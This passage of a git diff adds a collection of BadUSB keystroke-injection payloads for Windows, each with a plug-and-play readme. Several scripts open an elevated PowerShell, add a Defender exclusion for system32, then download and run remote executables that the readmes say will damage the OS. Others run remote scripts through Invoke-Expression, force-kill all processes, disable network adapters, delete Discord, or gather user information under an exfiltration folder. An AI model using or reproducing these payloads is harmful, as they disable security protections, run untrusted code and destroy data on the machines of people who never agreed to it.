";$Report >> $fileSaveDir'/ComputerInfo-57059022.html' +ENTER +STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md new file mode 100644 index 000000000..b0cc64dd5 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md @@ -0,0 +1,38 @@ + +# Win_User_Info +Saves some general Info about the current Win-User and stores it to a file. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change the path of the file "C:\PATH TO SAVE HERE\FILEresults-57059022.zip" + + +## Features + +- open powershell +- get win user info +- save info to a file + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt new file mode 100644 index 000000000..15d85ac3c --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt @@ -0,0 +1,19 @@ +REM Author: AGO061 +REM Description: AmongUs takes over the PC!!! +REM Version: 1.0 +REM Category: FUN +DELAY 500 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 1500 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1500 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/badusb-payloads/releases/download/SUS-R1/sus.exe';$file='sus.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md new file mode 100644 index 000000000..73ebb29a8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md @@ -0,0 +1,35 @@ + +# JustAmongUs +Please be really careful with this. I will not be responsible for any damage. This script can/will damage your OS. + +## How to use? + +This script is plug and play. + + +## Features + +- download sus.exe +- run sus.exe + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt new file mode 100644 index 000000000..c4c87c1f2 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt @@ -0,0 +1,22 @@ +REM Title: Rick-Roll BSOD +REM Author: FalsePhilosopher + AGO061 +REM Target: Win 10+, exe is Windows 7 and up 32/64 bit +REM Props: Hak5, bemxio for creating mario-head https://github.com/bemxio/mario-head, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes, AGO061 for making the rickroll version +REM Version: 1.0 +REM Category: Prank +REM Display a video of a rick rolll, the video glitches and explodes and invokes a BSOD. +DELAY 400 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +CTRL-SHIFT ENTER +DELAY 850 +SHIFT TAB +DELAY 500 +ENTER +DELAY 1000 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 500 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/rickroll-bsod/releases/download/first-version/rick_dist.exe';$file='rick_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md new file mode 100644 index 000000000..d8968cb43 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md @@ -0,0 +1,35 @@ + +# RickRoll_IntoBSOD +Please be really careful with this. I will not be responsible for any damage. This script can/will damage your OS. + +## How to use? + +This script is plug and play. + + +## Features + +- download rick_dist.exe +- run rick_dist.exe + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt new file mode 100644 index 000000000..af5732aae --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt @@ -0,0 +1,9 @@ +REM ---------CARTMAN SPAM---------- +REM -- by Mr-Savag3 --- 09162022 -- +REM -- updated to 1 line by ------- +REM ---------------- I Am Jakoby -- +DELAY 500 +GUI r +DELAY 600 +STRING powershell -w h $k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $k;$i++){$o.SendKeys([char] 175)}; 1..10|foreach {saps https://www.youtube.com/watch?v=U3sAkAWfxLY;sleep 1;$o.SendKeys('f')} +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/readme.md new file mode 100644 index 000000000..5362166cf --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/readme.md @@ -0,0 +1,35 @@ + +# Cartman +Opens a weird cartman clip on youtube and turns the volume up to 100%. + +## How to use? + +This script is plug and play. + + +## Features + +- open youtube video +- turn volume up + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/change_dpi150.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/change_dpi150.txt new file mode 100644 index 000000000..bf30a6a99 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/change_dpi150.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D +REM Description: Uses the monitor DPI to change the zoom to 150%. +REM Version: 1.0 +REM Category: FUN +DELAY 800 +GUI r +DELAY 800 +STRING powershell Start-Process powershell -Verb runAs +DELAY 800 +ENTER +DELAY 800 +LEFTARROW +DELAY 800 +ENTER +DELAY 500 +STRING Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/UNC0V3R3D/resources/main/dpi_code.ps1").Content +DELAY 200 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/readme.md new file mode 100644 index 000000000..bb8fd60a8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/readme.md @@ -0,0 +1,31 @@ +# Change_Zoom +Uses the monitor DPI to change the zoom to 150%. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- change monitor dpi + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt new file mode 100644 index 000000000..bacac7a61 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt @@ -0,0 +1,12 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Makes the computer speak +REM Version: 1.0 +REM Category: FUN +DELAY 750 +WINDOWS d +DELAY 950 +WINDOWS r +DELAY 650 +STRING powershell.exe -nop -win hidden -c "Add-Type -AssemblyName System.speech; $synth = New-Object System.Speech.Synthesis.SpeechSynthesizer; $synth.Speak('Hello you behind the Screen, I am inside your PC.')" +DELAY 100 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md new file mode 100644 index 000000000..4bd73df50 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md @@ -0,0 +1,37 @@ + +# ComputerTalks +Makes the computer speak. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change the text if you WANT to "$synth.Speak('Hello you behind the Screen, I am inside your PC.')"" + + +## Features + +- open powershell +- use system.speech to talk + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/deactivate_networkadapters.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/deactivate_networkadapters.txt new file mode 100644 index 000000000..076eeabdc --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/deactivate_networkadapters.txt @@ -0,0 +1,20 @@ +REM Author: UNC0V3R3D +REM Description: Uses the device manager to deactivate all networkadapters. +REM Version: 1.0 +REM Category: FUN +DELAY 800 +GUI r +DELAY 800 +STRING powershell Start-Process powershell -Verb runAs +DELAY 800 +ENTER +DELAY 800 +LEFTARROW +DELAY 800 +ENTER +DELAY 500 +STRING Get-NetAdapter | ForEach-Object { Disable-NetAdapter -Name $_.Name -Confirm:$false } +ENTER +DELAY 1000 +STRING exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/readme.md new file mode 100644 index 000000000..599878595 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/readme.md @@ -0,0 +1,32 @@ +# Deactivate_Networkadapters +Uses the device manager to deactivate all networkadapters. + +## How to use? + +This script is plug and play. + + +## Features + +- open device manager (powershell) +- deactivate adapters + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt new file mode 100644 index 000000000..76a788bb6 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt @@ -0,0 +1,20 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Deletes discord if it exists on the target pc. +REM Version: 1.0 +REM Category: Fun +DELAY 500 +GUI r +DELAY 300 +REM Start PowerShell as Admin +STRING powershell Start-Process powershell -Verb runAs +DELAY 300 +ENTER +DELAY 500 +LEFTARROW +DELAY 450 +ENTER +DELAY 600 +REM delete discord +STRING if (Test-Path "C:\Program Files (x86)\Discord") { Remove-Item -Recurse -Force "C:\Program Files (x86)\Discord"; Write-Output "Deleted Discord from $discordPath" } else { Write-Output "Discord is not installed on this computer." }; exit +DELAY 200 +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md new file mode 100644 index 000000000..7d7292830 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md @@ -0,0 +1,36 @@ + +# Delete_discord +Checks if discord is installed on the target, if it is installed it will delete discord. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- check if discord is installed +- delete discord if exists + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt new file mode 100644 index 000000000..2b278e921 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt @@ -0,0 +1,37 @@ +REM Author: overwraith +REM Description: Opens a few Tabs... +REM Version: 1.0 +REM Category: FUN +DELAY 1200 +GUI r +DELAY 400 +STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K +DELAY 500 +ENTER +DELAY 750 +STRING DEL /Q MobileTabs.vbs +ENTER +STRING copy con MobileTabs.vbs +ENTER +STRING on error resume next +ENTER +STRING navOpenInBackgroundTab = &h1000 +ENTER +STRING set oIE = CreateObject("InternetExplorer.Application") +ENTER +STRING Set args = WScript.Arguments +ENTER +STRING oIE.Navigate2 args.Item(0) +ENTER +STRING for intx = 1 to args.count +ENTER +STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab +ENTER +STRING next +ENTER +STRING oIE.Visible = true +ENTER +CONTROL z +ENTER +STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/" +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md new file mode 100644 index 000000000..cd91144f6 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md @@ -0,0 +1,35 @@ + +# Destroy_Pc_with_tabs +Opens a few tabs... maybe too many. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- use system.speech to talk + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/end_processes.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/end_processes.txt new file mode 100644 index 000000000..e7ecbf4fa --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/end_processes.txt @@ -0,0 +1,17 @@ +REM Author: UNC0V3R3D +REM Description: Uses the taskmanager and tries to end all processes +REM Version: 1.0 +REM Category: FUN +DELAY 800 +GUI r +DELAY 800 +STRING powershell Start-Process powershell -Verb runAs +DELAY 800 +ENTER +DELAY 800 +LEFTARROW +DELAY 800 +ENTER +DELAY 500 +STRING Start-Process taskmgr.exe -WindowStyle Hidden; Get-Process | Where-Object { $_.Name -ne "taskmgr" } | Stop-Process -Force +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/readme.md new file mode 100644 index 000000000..5b7e59801 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/readme.md @@ -0,0 +1,32 @@ +# End_Processes +Uses the taskmanager and tries to end all processes + +## How to use? + +This script is plug and play. + + +## Features + +- open taskmanager +- end all processes + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt new file mode 100644 index 000000000..80ab1438f --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt @@ -0,0 +1,14 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens a Website with an fake Bluescreen and setting it to fullscreen +REM Version: 1.0 +REM Category: FUN +DELAY 500 +GUI r +DELAY 400 +STRING cmd +ENTER +DELAY 500 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html +ENTER +DELAY 1000 +F11 diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md new file mode 100644 index 000000000..f48655b36 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md @@ -0,0 +1,35 @@ + +# FakeBluescreen +Opens a website that has a fake BSOD and maximizes the window. + +## How to use? + +This script is plug and play. + + +## Features + +- open website +- maximize window + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt new file mode 100644 index 000000000..826baaeed --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt @@ -0,0 +1,14 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens a Website with an fake Update and setting it to fullscreen +REM Version: 1.0 +REM Category: FUN +DELAY 500 +GUI r +DELAY 400 +STRING cmd +ENTER +DELAY 500 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/ +ENTER +DELAY 1000 +F11 diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md new file mode 100644 index 000000000..30bcf3789 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md @@ -0,0 +1,35 @@ + +# FakeUpdateWindows +Opens a website that has a fake windows update and maximizes the window. + +## How to use? + +This script is plug and play. + + +## Features + +- open website +- maximize window + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt new file mode 100644 index 000000000..62a9eea7d --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt @@ -0,0 +1,14 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens a Website with an fake Virus and setting it to fullscreen +REM Version: 1.0 +REM Category: FUN +DELAY 500 +GUI r +DELAY 400 +STRING cmd +ENTER +DELAY 500 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/wnc/ +ENTER +DELAY 1000 +F11 diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/readme.md new file mode 100644 index 000000000..51eda9dc8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/readme.md @@ -0,0 +1,35 @@ + +# FakeVirus +Opens a Website with an fake Virus and setting it to fullscreen. + +## How to use? + +This script is plug and play. + + +## Features + +- open website +- maximize window + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt new file mode 100644 index 000000000..7a5312e1a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt @@ -0,0 +1,51 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: There'll be the matrix rain in the cmd +REM Version: 1.0 +REM Category: FUN +DELAY 1000 +GUI r +DELAY 100 +STRING notepad +ENTER +DELAY 100 +STRING @echo off +ENTER +ENTER +DELAY 100 +STRING color 02 +ENTER +ENTER +DELAY 100 +STRING mode 1000 +ENTER +ENTER +DELAY 100 +STRING :matrixbynima +ENTER +ENTER +DELAY 100 +STRING echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% +ENTER +ENTER +DELAY 100 +STRING goto matrixbynima +ENTER +DELAY 100 +CTRL S +DELAY 200 +REM change %userprofile% to your user or the devices user that your using this on +STRING %userprofile%\Desktop\matrix.bat +ENTER +DELAY 1000 +GUI r +DELAY 100 +STRING cmd +ENTER +DELAY 100 +STRING cd %userprofile%\Desktop\ +ENTER +DELAY 50 +STRING matrix.bat +ENTER +DELAY 1500 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md new file mode 100644 index 000000000..de5ddc6a8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md @@ -0,0 +1,36 @@ + +# Matrix_Rain_CMD +There'll be the matrix rain in the windows cmd. + +## How to use? + +This script is plug and play. + + +## Features + +- open cmd +- write script +- maximize window + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt new file mode 100644 index 000000000..7705a557a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt @@ -0,0 +1,18 @@ +REM Author: UNC0V3R3D +REM Description: Mutes windows audio... +REM Version: 1.0 +REM Category: FUN +DELAY 500 +GUI r +DELAY 300 +STRING powershell Start-Process powershell -Verb runAs +DELAY 200 +ENTER +DELAY 600 +LEFTARROW +DELAY 300 +ENTER +DELAY 450 +STRING (new-object -com wscript.shell).SendKeys([char]173) +DELAY 200 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md new file mode 100644 index 000000000..dc009355c --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md @@ -0,0 +1,35 @@ + +# NoMoreSound +Mutes the windows audio. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- mute windows audio + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/monitor_rotation.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/monitor_rotation.txt new file mode 100644 index 000000000..2ccc47c20 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/monitor_rotation.txt @@ -0,0 +1,16 @@ +REM Author: UNC0V3R3D +REM Description: Uses powershell to rotate the monitor by 90 degrees. +REM Version: 1.0 +REM Category: FUN +DELAY 800 +GUI r +DELAY 800 +STRING powershell Start-Process powershell -Verb runAs +DELAY 800 +ENTER +DELAY 800 +LEFTARROW +DELAY 800 +ENTER +DELAY 500 +STRING Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/UNC0V3R3D/resources/main/monitor_rotation.ps1").Content diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/readme.md new file mode 100644 index 000000000..df3e46609 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/readme.md @@ -0,0 +1,31 @@ +# Rotate_Monitor +Uses powershell to rotate the monitor by 90 degrees. + +## How to use? + +This script is plug and play. + + +## Features + +- open powershell +- rotate monitor by 90° + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt new file mode 100644 index 000000000..5d1a221e6 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt @@ -0,0 +1,37 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want. +REM Version: 1.0 +REM Category: FUN +DELAY 2000 +GUI r 